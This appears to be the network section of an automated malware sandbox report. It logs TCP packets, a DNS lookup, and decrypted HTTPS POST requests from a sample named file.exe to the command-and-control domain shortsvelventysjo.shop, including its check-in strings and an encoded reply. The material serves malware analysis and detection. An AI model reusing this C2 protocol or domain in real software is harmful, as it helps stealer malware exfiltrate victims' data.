                                                Apr 25, 2024 17:38:59.106769085 CEST49707443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:38:59.106769085 CEST49707443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:38:59.106863976 CEST44349707104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:38:59.579265118 CEST44349707104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:38:59.579355001 CEST44349707104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:38:59.579407930 CEST49707443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:38:59.582103014 CEST49707443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:38:59.582123041 CEST44349707104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:38:59.604352951 CEST49708443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:38:59.604387999 CEST44349708104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:38:59.604456902 CEST49708443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:38:59.604921103 CEST49708443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:38:59.604950905 CEST44349708104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:38:59.838892937 CEST44349708104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:38:59.839015961 CEST49708443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:38:59.841140032 CEST49708443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:38:59.841147900 CEST44349708104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:38:59.841355085 CEST44349708104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:38:59.842716932 CEST49708443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:38:59.842752934 CEST49708443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:38:59.842784882 CEST44349708104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:00.377507925 CEST44349708104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:00.377548933 CEST44349708104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:00.377573013 CEST44349708104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:00.377598047 CEST49708443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:00.377602100 CEST44349708104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:00.377614021 CEST44349708104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:00.377641916 CEST44349708104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:00.377654076 CEST49708443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:00.377665043 CEST44349708104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:00.377676964 CEST49708443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:00.377806902 CEST44349708104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:00.377849102 CEST49708443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:00.377856970 CEST44349708104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:00.377911091 CEST44349708104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:00.377947092 CEST49708443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:00.377954006 CEST44349708104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:00.378433943 CEST44349708104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:00.378479958 CEST49708443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:00.378485918 CEST44349708104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:00.378509998 CEST44349708104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:00.378552914 CEST49708443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:00.378688097 CEST49708443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:00.378700972 CEST44349708104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:00.378720045 CEST49708443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:00.378725052 CEST44349708104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:00.543819904 CEST49709443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:00.543905973 CEST44349709104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:00.544009924 CEST49709443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:00.544363976 CEST49709443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:00.544394970 CEST44349709104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:00.772568941 CEST44349709104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:00.772696972 CEST49709443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:00.786940098 CEST49709443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:00.786973953 CEST44349709104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:00.787293911 CEST44349709104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:00.788969040 CEST49709443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:00.789202929 CEST49709443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:00.789248943 CEST44349709104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:01.310022116 CEST44349709104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:01.310167074 CEST44349709104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:01.310281992 CEST49709443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:01.310525894 CEST49709443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:01.310564995 CEST44349709104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:01.465238094 CEST49710443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:01.465274096 CEST44349710104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:01.465370893 CEST49710443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:01.465789080 CEST49710443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:01.465805054 CEST44349710104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:01.697202921 CEST44349710104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:01.697418928 CEST49710443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:01.698666096 CEST49710443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:01.698677063 CEST44349710104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:01.699001074 CEST44349710104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:01.700251102 CEST49710443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:01.700331926 CEST49710443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:01.700366020 CEST44349710104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:01.700414896 CEST49710443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:01.700422049 CEST44349710104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:02.219813108 CEST44349710104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:02.219976902 CEST44349710104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:02.220046043 CEST49710443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:02.220097065 CEST49710443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:02.220115900 CEST44349710104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:02.392079115 CEST49711443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:02.392137051 CEST44349711104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:02.392211914 CEST49711443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:02.392596006 CEST49711443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:02.392615080 CEST44349711104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:02.624383926 CEST44349711104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:02.624510050 CEST49711443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:02.626246929 CEST49711443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:02.626257896 CEST44349711104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:02.626590014 CEST44349711104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:02.627935886 CEST49711443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:02.628106117 CEST49711443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:02.628140926 CEST44349711104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:02.628207922 CEST49711443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:02.628221989 CEST44349711104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:03.204041004 CEST44349711104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:03.204176903 CEST44349711104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:03.204252005 CEST49711443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:03.204463959 CEST49711443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:03.204492092 CEST44349711104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:03.546236038 CEST49712443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:03.546334982 CEST44349712104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:03.546437025 CEST49712443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:03.546775103 CEST49712443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:03.546817064 CEST44349712104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:03.779428005 CEST44349712104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:03.779545069 CEST49712443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:03.781058073 CEST49712443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:03.781076908 CEST44349712104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:03.781415939 CEST44349712104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:03.782654047 CEST49712443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:03.782768011 CEST49712443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:03.782810926 CEST44349712104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:04.289796114 CEST44349712104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:04.289913893 CEST44349712104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:04.290004969 CEST49712443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:04.290240049 CEST49712443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:04.290281057 CEST44349712104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:04.371484995 CEST49713443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:04.371520042 CEST44349713104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:04.371627092 CEST49713443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:04.372064114 CEST49713443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:04.372076035 CEST44349713104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:04.602305889 CEST44349713104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:04.602545977 CEST49713443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:04.603974104 CEST49713443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:04.603985071 CEST44349713104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:04.604321003 CEST44349713104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:04.605710983 CEST49713443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:04.605853081 CEST49713443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:04.605859041 CEST44349713104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:05.152070045 CEST44349713104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:05.152214050 CEST44349713104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:05.152297974 CEST49713443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:05.152487040 CEST49713443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:05.152509928 CEST44349713104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:05.733846903 CEST49714443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:05.733896017 CEST44349714104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:05.733985901 CEST49714443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:05.734458923 CEST49714443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:05.734486103 CEST44349714104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:05.967143059 CEST44349714104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:05.967221975 CEST49714443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:05.968835115 CEST49714443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:05.968849897 CEST44349714104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:05.969249964 CEST44349714104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:05.970410109 CEST49714443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:05.971254110 CEST49714443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:05.971303940 CEST44349714104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:05.971411943 CEST49714443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:05.971461058 CEST44349714104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:05.971597910 CEST49714443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:05.971632957 CEST44349714104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:05.971774101 CEST49714443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:05.971816063 CEST44349714104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:05.971973896 CEST49714443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:05.972023010 CEST44349714104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:05.972215891 CEST49714443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:05.972250938 CEST44349714104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:05.972274065 CEST49714443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:05.972302914 CEST44349714104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:05.972381115 CEST49714443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:05.972418070 CEST44349714104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:05.972455978 CEST49714443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:05.972656012 CEST49714443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:05.972695112 CEST49714443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:06.016135931 CEST44349714104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:06.016372919 CEST49714443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:06.016441107 CEST49714443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:06.016509056 CEST49714443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:06.060127974 CEST44349714104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:06.060338020 CEST49714443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:06.104141951 CEST44349714104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:08.313520908 CEST44349714104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:08.313627958 CEST44349714104.21.16.225192.168.2.5
                                                Apr 25, 2024 17:39:08.313697100 CEST49714443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:08.313776970 CEST49714443192.168.2.5104.21.16.225
                                                Apr 25, 2024 17:39:08.313837051 CEST44349714104.21.16.225192.168.2.5

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Apr 25, 2024 17:38:58.683515072 CEST5375153192.168.2.51.1.1.1
                                                Apr 25, 2024 17:38:58.797574043 CEST53537511.1.1.1192.168.2.5

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Apr 25, 2024 17:38:58.683515072 CEST192.168.2.51.1.1.10x6ffdStandard query (0)shortsvelventysjo.shopA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Apr 25, 2024 17:38:58.797574043 CEST1.1.1.1192.168.2.50x6ffdNo error (0)shortsvelventysjo.shop104.21.16.225A (IP address)IN (0x0001)false
                                                Apr 25, 2024 17:38:58.797574043 CEST1.1.1.1192.168.2.50x6ffdNo error (0)shortsvelventysjo.shop172.67.216.69A (IP address)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • shortsvelventysjo.shop

                                                HTTPS Proxied Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.549707104.21.16.2254436608C:\Users\user\Desktop\file.exe
                                                TimestampBytes transferredDirectionData
                                                2024-04-25 15:38:59 UTC269OUTPOST /api HTTP/1.1
                                                Connection: Keep-Alive
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                Content-Length: 8
                                                Host: shortsvelventysjo.shop
                                                2024-04-25 15:38:59 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                Data Ascii: act=life
                                                2024-04-25 15:38:59 UTC806INHTTP/1.1 200 OK
                                                Date: Thu, 25 Apr 2024 15:38:59 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Set-Cookie: PHPSESSID=iu18hhmk0roe9ju2ohdc7d9ads; expires=Mon, 19-Aug-2024 09:25:38 GMT; Max-Age=9999999; path=/
                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                Cache-Control: no-store, no-cache, must-revalidate
                                                Pragma: no-cache
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DobClphGmcDDrwd%2FQvANzmF8n8RNt4kaKSjW448LBofNAL39p0GQT5m%2FtKhsisgICxtRrd%2Bw2Nev58MSUYPCnpDcIRD2rpRwrShU8HqRrAXAHTOQV8NFgECJYPcC1yaJt%2FNlvAnLhF9J"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 879f6c585b641873-ATL
                                                alt-svc: h3=":443"; ma=86400
                                                2024-04-25 15:38:59 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                Data Ascii: 2ok
                                                2024-04-25 15:38:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.549708104.21.16.2254436608C:\Users\user\Desktop\file.exe
                                                TimestampBytes transferredDirectionData
                                                2024-04-25 15:38:59 UTC270OUTPOST /api HTTP/1.1
                                                Connection: Keep-Alive
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                Content-Length: 55
                                                Host: shortsvelventysjo.shop
                                                2024-04-25 15:38:59 UTC55OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 45 72 4e 31 4e 75 2d 2d 63 72 79 70 74 6f 26 6a 3d 64 65 66 61 75 6c 74
                                                Data Ascii: act=recive_message&ver=4.0&lid=ErN1Nu--crypto&j=default
                                                2024-04-25 15:39:00 UTC804INHTTP/1.1 200 OK
                                                Date: Thu, 25 Apr 2024 15:39:00 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Set-Cookie: PHPSESSID=fg0kl3ub01nkoi4ma5eo0gp6k5; expires=Mon, 19-Aug-2024 09:25:39 GMT; Max-Age=9999999; path=/
                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                Cache-Control: no-store, no-cache, must-revalidate
                                                Pragma: no-cache
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IOfupNramBtHhKjqNqT3Dd4tWdL4y7XaU7h2B1jBpQ6GHgikQF51gQ0c4R7bIl9x7%2FDRHc77xl4JMWqLOCNXs8mRI4%2F56ZwNQIdiNPhdFgY22NAx7Pmxp%2BL6oPMCfLmirTToKsY1uqf9"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 879f6c5d5d68139d-ATL
                                                alt-svc: h3=":443"; ma=86400
                                                2024-04-25 15:39:00 UTC565INData Raw: 33 61 65 34 0d 0a 36 44 64 4e 32 54 43 49 78 61 78 53 32 43 5a 4d 64 67 39 74 30 62 48 49 50 48 61 6e 6f 53 30 6d 56 4c 69 37 4b 4f 63 4a 6a 30 65 54 50 55 54 37 52 71 72 2f 6a 47 62 30 4c 45 56 55 66 41 6a 7a 69 2b 68 49 42 4e 4c 45 41 53 78 64 6d 74 70 4d 78 54 4f 76 49 59 6c 62 50 72 77 63 67 73 79 4f 50 36 41 45 64 6c 5a 55 5a 39 6a 4b 77 6a 56 2f 68 63 52 44 42 47 36 59 6d 56 2b 43 61 2b 6f 2f 6e 46 49 6a 71 6c 6e 6e 71 2b 77 2f 76 56 49 74 47 32 34 65 75 70 2b 68 55 31 53 4c 71 79 51 76 64 74 33 42 43 74 30 70 72 51 71 4e 51 79 79 55 55 66 75 75 6a 6e 37 53 4c 30 56 55 61 68 6e 7a 69 2b 67 65 4b 6f 58 52 54 46 51 31 31 63 68 30 78 54 50 30 47 38 70 65 4f 62 78 43 36 62 48 46 50 62 5a 56 45 46 51 31 57 2b 47 42 2b 41 78 47 32 6f 4d 6e 4c 79 6d 79 73
                                                Data Ascii: 3ae46DdN2TCIxaxS2CZMdg9t0bHIPHanoS0mVLi7KOcJj0eTPUT7Rqr/jGb0LEVUfAjzi+hIBNLEASxdmtpMxTOvIYlbPrwcgsyOP6AEdlZUZ9jKwjV/hcRDBG6YmV+Ca+o/nFIjqlnnq+w/vVItG24eup+hU1SLqyQvdt3BCt0prQqNQyyUUfuujn7SL0VUahnzi+geKoXRTFQ11ch0xTP0G8peObxC6bHFPbZVEFQ1W+GB+AxG2oMnLymys
                                                2024-04-25 15:39:00 UTC1369INData Raw: 35 45 75 79 70 7a 7a 32 36 56 69 59 66 5a 67 71 68 32 4b 4e 54 47 63 58 4f 52 55 73 31 32 74 35 41 6a 32 54 6e 49 59 64 59 4b 62 74 53 71 75 6d 6d 57 39 45 45 4b 51 77 74 56 2f 47 54 69 56 73 45 77 73 39 5a 42 67 79 61 73 53 47 61 4a 59 5a 6e 79 44 31 45 6f 6a 71 42 7a 49 34 33 74 67 52 32 56 69 30 48 74 74 43 70 56 52 76 47 79 30 52 57 4e 73 6a 66 52 34 42 35 36 79 43 45 58 79 79 70 57 4f 53 68 7a 54 6d 78 54 53 73 54 61 55 2f 39 75 38 45 31 56 4d 4c 62 44 78 78 30 6d 76 68 48 6a 6d 66 6e 4d 6f 6f 56 52 39 42 4e 70 4d 2b 6c 4b 64 49 76 52 56 52 71 41 2f 4f 4c 36 42 34 51 78 4d 64 4f 51 44 6a 55 33 55 61 44 5a 65 41 71 6a 46 38 76 76 46 6a 69 72 38 38 39 73 55 73 75 45 57 41 4c 74 64 2b 72 57 31 53 4c 71 79 51 76 64 74 33 42 43 74 30 70 72 51 75 4e 56 6a
                                                Data Ascii: 5Euypzz26ViYfZgqh2KNTGcXORUs12t5Aj2TnIYdYKbtSqummW9EEKQwtV/GTiVsEws9ZBgyasSGaJYZnyD1EojqBzI43tgR2Vi0HttCpVRvGy0RWNsjfR4B56yCEXyypWOShzTmxTSsTaU/9u8E1VMLbDxx0mvhHjmfnMooVR9BNpM+lKdIvRVRqA/OL6B4QxMdOQDjU3UaDZeAqjF8vvFjir889sUsuEWALtd+rW1SLqyQvdt3BCt0prQuNVj
                                                2024-04-25 15:39:00 UTC1369INData Raw: 6f 4d 63 35 73 45 55 67 47 32 59 44 74 73 47 68 55 52 7a 4b 77 6b 4a 4a 50 64 37 5a 43 73 73 44 68 6b 37 4b 55 6a 66 37 43 71 6a 6e 37 7a 32 31 56 69 30 46 4c 7a 71 77 33 61 52 5a 41 6f 57 72 4a 46 74 34 73 72 4a 54 37 51 43 47 5a 59 31 5a 62 2b 4d 51 71 71 62 43 50 4c 74 4c 4b 42 35 6c 44 4c 4c 42 6f 31 45 63 79 73 70 4f 52 7a 4c 62 30 31 69 58 61 2b 45 33 68 6c 38 70 74 46 2f 6d 35 34 42 59 30 53 39 75 45 33 56 50 36 35 48 71 64 42 66 52 77 45 55 47 41 39 6e 58 52 49 4a 39 72 55 33 68 53 6d 48 54 4f 66 50 50 70 56 76 36 51 79 4a 55 4e 55 33 7a 33 71 74 57 45 74 66 4d 51 6b 63 34 31 4e 5a 50 69 6d 50 74 4a 59 64 51 4b 37 42 5a 36 61 72 4b 49 72 42 45 4a 68 46 73 42 62 6d 54 35 44 5a 2f 72 6f 4e 49 58 48 61 43 6d 77 71 30 66 4f 5a 6e 76 31 59 68 74 56 58
                                                Data Ascii: oMc5sEUgG2YDtsGhURzKwkJJPd7ZCssDhk7KUjf7Cqjn7z21Vi0FLzqw3aRZAoWrJFt4srJT7QCGZY1Zb+MQqqbCPLtLKB5lDLLBo1EcyspORzLb01iXa+E3hl8ptF/m54BY0S9uE3VP65HqdBfRwEUGA9nXRIJ9rU3hSmHTOfPPpVv6QyJUNU3z3qtWEtfMQkc41NZPimPtJYdQK7BZ6arKIrBEJhFsBbmT5DZ/roNIXHaCmwq0fOZnv1YhtVX
                                                2024-04-25 15:39:00 UTC1369INData Raw: 62 31 50 4c 51 5a 2f 44 4c 66 64 70 68 35 61 72 61 67 6b 42 44 48 43 6d 52 4c 48 4b 38 67 79 69 55 55 70 75 42 4b 43 7a 4e 46 2b 30 69 38 33 66 41 5a 6b 38 39 53 6d 48 6b 79 48 67 30 39 4b 4f 74 48 65 51 59 35 76 36 53 57 48 58 69 47 31 57 2b 61 76 77 6a 65 6f 53 53 73 63 5a 77 61 32 33 36 64 64 42 73 62 43 44 77 70 65 73 62 49 4b 67 6e 4f 74 66 63 67 56 43 49 68 6c 79 65 65 6d 57 36 55 4b 52 6e 39 30 5a 39 69 34 36 6c 6b 59 68 5a 73 4e 42 44 66 53 33 6b 53 42 65 65 4d 33 68 46 49 76 76 56 72 69 6f 4d 49 2b 74 46 59 6d 46 57 30 42 76 4e 75 6a 57 68 58 42 78 30 4e 44 64 70 53 78 49 65 34 72 36 6a 33 4b 44 57 33 37 65 75 6d 39 31 48 4b 55 54 79 34 54 66 52 6d 6f 6b 38 49 31 43 34 75 72 4a 46 31 65 73 62 49 4b 67 6d 65 74 66 63 67 56 4b 37 42 59 34 36 54 48
                                                Data Ascii: b1PLQZ/DLfdph5aragkBDHCmRLHK8gyiUUpuBKCzNF+0i83fAZk89SmHkyHg09KOtHeQY5v6SWHXiG1W+avwjeoSSscZwa236ddBsbCDwpesbIKgnOtfcgVCIhlyeemW6UKRn90Z9i46lkYhZsNBDfS3kSBeeM3hFIvvVrioMI+tFYmFW0BvNujWhXBx0NDdpSxIe4r6j3KDW37eum91HKUTy4TfRmok8I1C4urJF1esbIKgmetfcgVK7BY46TH
                                                2024-04-25 15:39:00 UTC1369INData Raw: 63 58 59 51 6d 79 33 61 70 51 46 49 57 4e 4a 79 39 64 6d 74 35 53 78 54 4f 76 5a 61 70 65 4f 61 35 52 2b 71 48 4a 50 50 6f 73 52 51 73 6a 5a 39 6a 4b 77 6a 56 2f 68 63 52 44 42 47 36 59 6d 55 53 58 62 2b 77 6c 67 6c 77 6a 73 46 72 34 6f 4d 6b 37 74 45 6f 6c 45 47 45 47 75 4e 71 76 55 68 58 4f 79 6b 70 41 50 4e 7a 55 43 73 73 44 68 6b 37 4b 55 6a 66 37 43 71 6a 6e 34 6a 4f 31 54 32 35 38 42 68 44 39 75 38 46 48 66 4b 36 6f 44 30 4d 36 6d 6f 45 49 78 57 7a 6c 4c 59 52 57 4b 62 42 65 35 71 62 48 4e 72 39 4d 4b 52 74 71 42 72 54 54 72 45 77 54 79 4d 70 50 54 7a 2f 51 33 55 75 4f 4b 36 4e 4e 34 54 35 76 76 45 71 71 2f 34 78 77 69 45 4d 34 42 47 35 50 32 37 69 31 45 48 2b 74 71 46 59 73 58 62 47 5a 54 59 6b 72 74 57 66 4b 57 44 32 36 56 2f 69 6a 77 54 75 6f 54
                                                Data Ascii: cXYQmy3apQFIWNJy9dmt5SxTOvZapeOa5R+qHJPPosRQsjZ9jKwjV/hcRDBG6YmUSXb+wlglwjsFr4oMk7tEolEGEGuNqvUhXOykpAPNzUCssDhk7KUjf7Cqjn4jO1T258BhD9u8FHfK6oD0M6moEIxWzlLYRWKbBe5qbHNr9MKRtqBrTTrEwTyMpPTz/Q3UuOK6NN4T5vvEqq/4xwiEM4BG5P27i1EH+tqFYsXbGZTYkrtWfKWD26V/ijwTuoT
